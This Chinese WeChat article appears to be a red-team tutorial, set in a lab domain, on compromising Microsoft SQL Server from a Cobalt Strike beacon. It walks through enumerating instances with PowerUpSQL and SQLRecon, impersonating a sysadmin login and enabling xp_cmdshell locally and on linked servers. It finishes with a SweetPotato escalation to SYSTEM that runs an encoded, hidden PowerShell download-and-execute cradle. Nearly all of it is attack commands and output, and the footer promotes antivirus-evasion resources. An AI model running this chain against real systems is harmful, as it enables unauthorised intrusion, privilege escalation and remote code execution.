由于微信公众号推送机制改变了，快来星标不再迷路，谢谢大家！

前言

微软SQL Server是一个关系型数据库依赖于windows环境，通常用于支持一些商业功能。除了这些功能之外，SQL Server还具有非常大的攻击面，比如命令执行，权限提升，横行移动以及权限维持。

正文

PowerUpSQL和SQLRecon是两款非常优秀的工具用于和SQL Server交互。

Get-SQLInstanceDomain的工作原理是搜索以MSSQL开头的SPN。

这个数据表明SQL-2运行在SQL Server，用户是mssql_svc域账户。

beacon> powershell-import C:\Tools\PowerUpSQL\PowerUpSQL.ps1
beacon> powershell Get-SQLInstanceDomain
ComputerName     : sql-2.dev.cyberbotic.io
Instance         : sql-2.dev.cyberbotic.io,1433
DomainAccountSid : 1500000521000672332383313895871914512914091400
DomainAccount    : mssql_svc
DomainAccountCn  : MS SQL Service
Service          : MSSQLSvc
Spn              : MSSQLSvc/sql-2.dev.cyberbotic.io:1433
LastLogon        : 8/15/2022 7:55 PM
Description      :

Get-SQLConnectionTest可以用来测试我们能是否能连接数据库

beacon> powershell Get-SQLConnectionTest -Instance "sql-2.dev.cyberbotic.io,1433" | fl
ComputerName : sql-2.dev.cyberbotic.io
Instance     : sql-2.dev.cyberbotic.io,1433
Status       : Accessible

Get-SQLServerInfo可以用来收集关于这个数据库的更多信息

beacon> powershell Get-SQLServerInfo -Instance "sql-2.dev.cyberbotic.io,1433"
ComputerName           : sql-2.dev.cyberbotic.io
Instance               : SQL-2
DomainName             : DEV
ServiceProcessID       : 2668
ServiceName            : MSSQLSERVER
ServiceAccount         : DEV\mssql_svc
AuthenticationMode     : Windows Authentication
ForcedEncryption       : 0
Clustered              : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion  : 2019
SQLServerEdition       : Standard Edition (64-bit)
SQLServerServicePack   : RTM
OSArchitecture         : X64
OsVersionNumber        : SQL
Currentlogin           : DEV\bfarmer
IsSysadmin             : No
ActiveSessions         : 1

可以通过下面这个命令进行在多实例当中收集信息

powershell Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo

SQLRecon可以判断我们的用户是什么权限

beacon> execute-assembly C:\Tools\SQLRecon\SQLRecon\bin\Release\SQLRecon.exe -a windows -s sql-2.dev.cyberbotic.io,1433 -m whoami
[+] Logged in as: 
DEV\bfarmer
[+] Mapped to the user: 
guest
[+] Roles: 
User is a member of public role
User is NOT a member of db_owner role
User is NOT a member of db_accessadmin role
User is NOT a member of db_securityadmin role
User is NOT a member of db_ddladmin role
User is NOT a member of db_backupoperator role
User is NOT a member of db_datareader role
User is NOT a member of db_datawriter role
User is NOT a member of db_denydatareader role
User is NOT a member of db_denydatawriter role
User is NOT a member of sysadmin role
User is NOT a member of setupadmin role
User is NOT a member of serveradmin role
User is NOT a member of securityadmin role
User is NOT a member of processadmin role
User is NOT a member of diskadmin role
User is NOT a member of dbcreator role
User is NOT a member of bulkadmin role

of bulkadmin role

MS SQL允许我们通过使用其他用户的权限，当我们不知道这个用户密码的时候，如果我们配置了继承，通过搜索查找。

SELECT * FROM sys.server_permissions WHERE permission_name = 'IMPERSONATE';

然后通过搜索ID查找更多信息

SELECT name, principal_id, type_desc, is_disabled FROM sys.server_principals;

SQLRecon也支持查找SQL Server的继承

beacon> execute-assembly C:\Tools\SQLRecon\SQLRecon\bin\Release\SQLRecon.exe -a windows -s sql-2.dev.cyberbotic.io,1433 -m impersonate
[+] Enumerating accounts that can be impersonated on sql-2.dev.cyberbotic.io,1433:
name | 
-------
DEV\mssql_svc |

通过EXECUTE AS直接使用

EXECUTE AS login = 'DEV\mssql_svc'; SELECT SYSTEM_USER;
DEV\mssql_svc
EXECUTE AS login = 'DEV\mssql_svc'; SELECT IS_SRVROLEMEMBER('sysadmin');
1

SQLRecon -i参数支持模拟用户

beacon> execute-assembly C:\Tools\SQLRecon\SQLRecon\bin\Release\SQLRecon.exe -a windows -s sql-2.dev.cyberbotic.io,1433 -m iwhoami -i DEV\mssql_svc
[+] Logged in as: 
DEV\mssql_svc
[+] Mapped to the user: 
dbo
[+] Roles: 
User is a member of public role
User is a member of sysadmin role
User is a member of setupadmin role
User is a member of serveradmin role
User is a member of securityadmin role
User is a member of processadmin role
User is a member of diskadmin role
User is a member of dbcreator role
User is a member of bulkadmin role

XP_CMDSHELL可以用于执行在SQL Server当中执行命令，当拥有sysadmin权限的时候。PowerUpSQL中的Invoke-SQLOSCMD提供了这样的一个功能。

beacon> powershell Invoke-SQLOSCmd -Instance "sql-2.dev.cyberbotic.io,1433" -Command "whoami" -RawResults
dev\mssql_svc

枚举查询xp_cmdshell的配置

SELECT value FROM sys.configurations WHERE name = 'xp_cmdshell';

恢复XP_CMDSHELL

sp_configure 'Show Advanced Options', 1; RECONFIGURE;
sp_configure 'xp_cmdshell', 1; RECONFIGURE;

SQL Server支持通过一种链接的方法从 MS SQL Servers中获取数据。可以通过这种方法获取链接信息。

SELECT srvname, srvproduct, rpcout FROM master..sysservers;

通过OpenQuery查找链接

SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername');

检查xp_cmdshell

SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'SELECT * FROM sys.configurations WHERE name = ''xp_cmdshell''');

通过下面的方式远程恢复

EXEC('sp_configure ''show advanced options'', 1; reconfigure;') AT [sql-1.cyberbotic.io] EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [sql-1.cyberbotic.io]

powershell Get-SQLServerLinkCrawl获取跟实例相关的链接

beacon> powershell Get-SQLServerLinkCrawl -Instance "sql-2.dev.cyberbotic.io,1433"
Version     : SQL Server 2019 
Instance    : SQL-2
CustomQuery : 
Sysadmin    : 1
Path        : {SQL-2}
User        : DEV\bfarmer
Links       : {SQL-1.CYBERBOTIC.IO}
Version     : SQL Server 2019 
Instance    : SQL-1
CustomQuery : 
Sysadmin    : 1
Path        : {SQL-2, SQL-1.CYBERBOTIC.IO}
User        : sa
Links       :

这里面的例子运行在 SQL Server当中，这里有一个SelmpersonatePrivilege权限，这个权限允许模仿客户端当认证完成后。

beacon> getuid
[*] You are NT Service\MSSQLSERVER
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe TokenPrivileges
====== TokenPrivileges ======
Current Token's Privileges
                SeAssignPrimaryTokenPrivilege:  DISABLED
                     SeIncreaseQuotaPrivilege:  DISABLED
                      SeChangeNotifyPrivilege:  SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
                       SeImpersonatePrivilege:  SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
                      SeCreateGlobalPrivilege:  SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
                SeIncreaseWorkingSetPrivilege:  DISABLED
[*] Completed collection in 0.037 seconds

但是因为原先的账号不是admin权限，所以它不能获取本地正在运行的SYSTEM权限进程。其中一个方法是强制启动一个系统服务认证攻击者的恶意服务，然后这个恶意服务就会获得SYSTEM权限。Sweetpotato就拥有这个功能，这里面是通过打印机漏洞，可以通过execute-assembly执行命令。

beacon> execute-assembly C:\Tools\SweetPotato\bin\Release\SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcwBxAGwALQAyAC4AZABlAHYALgBjAHkAYgBlAHIAYgBvAHQAaQBjAC4AaQBvADoAOAAwADgAMAAvAGMAJwApAA=="
SweetPotato by @_EthicalChaos_
  Orignal RottenPotato code and exploit by @foxglovesec
  Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
  PrintSpoofer discovery and original exploit by @itm4n
  EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam
[+] Attempting NP impersonation using method PrintSpoofer to launch C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
[+] Triggering notification on evil PIPE \\sql-1/pipe/b888d569-b66e-4280-b8c5-995afbb9b02c
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!
beacon> connect localhost 4444
[+] established link to child beacon: 10.10.120.25

欢 迎 加 入 星 球 ！

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

进成员内部群

星球的最近主题和星球内部工具一些展示

加入安全交流群

                               

关 注 有 礼

关注下方公众号回复“666”可以领取一套领取黑客成长秘籍

 还在等什么？赶紧点击下方名片关注学习吧！

推荐阅读

干货｜史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明

由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号渗透安全团队及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉。谢谢！